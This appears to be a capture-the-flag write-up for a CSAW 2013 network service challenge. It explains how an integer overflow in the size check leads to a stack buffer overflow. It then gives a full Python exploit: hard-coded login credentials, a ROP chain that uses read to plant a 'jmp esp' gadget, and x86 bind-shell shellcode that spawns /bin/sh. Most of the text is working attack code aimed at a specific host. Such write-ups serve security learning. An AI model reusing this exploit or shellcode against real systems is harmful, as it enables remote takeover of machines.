That is a network service. I can connect it by netcat. then i must input username password and seomething else.
After i analysis the service. I find out the process of login and i find the username and password
Then I input username and password. I input a number(size) and a string(buff).
“size” > 1 and “size” + 1 < 0x400
Then I input The buff and the buff must ASCII Characters.
last the program will open a file. write it to the buff. If the length of buff is more than 0x400. write it to the top 1024 of buff.
there will be overflow when the program recv the string which you input. but the length of buff must less than 0x400.
0xffff + 1 == ； 0 0xffff == 65535
now we can input any string which we want :)
then i will write the exp.
'A' * 0x420 + ret_address
there is not “jmp esp” in program when i use objdump. but the program use the function of read. i can use read to write “jmp esp” in static area.
read(fd, buff, buffsize)
read: call 80486e0 read@plt
fd:4 (the fd of client socket)
read( 4, *0x080486e0, 2)
now the send “jmp esp” and the program will write in memory.
'A' * 0x420 + read + pop3ret + fd + static_area + "\x90" + shellcode
now I did it.use the exp and use nc connect remote server.
import sys, os, time, struct, socket def p32(addr): return struct.pack("<I", addr) def r(s, t=0.1): time.sleep(t) return s.recv(8192) def se(s, buf): s.send(buf) HOST = "188.8.131.52" HOST = "192.168.1.180" PORT = 34266 SHELLCODE = \ "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" +\ "\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" +\ "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" +\ "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" +\ "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" +\ "\x0b\xcd\x80" s = socket.socket() s.connect((HOST, PORT)) print r(s) se(s, "csaw2013") print r(s) se(s, "S1mplePWD") print r(s) se(s, "65535") read = p32(0x80486e0) pop3ret = p32(0x8049110) static = p32(0x804b000) fd = p32(4) jmpesp = "\xff\xe4" buf = "A" * (1056 + 0) buf = "A" * 0x420 buf += read + pop3ret + fd + static + p32(2) + static + "\x90" * 100 + SHELLCODE se(s, buf) time.sleep(5) se(s, jmpesp) print 'OK!!!'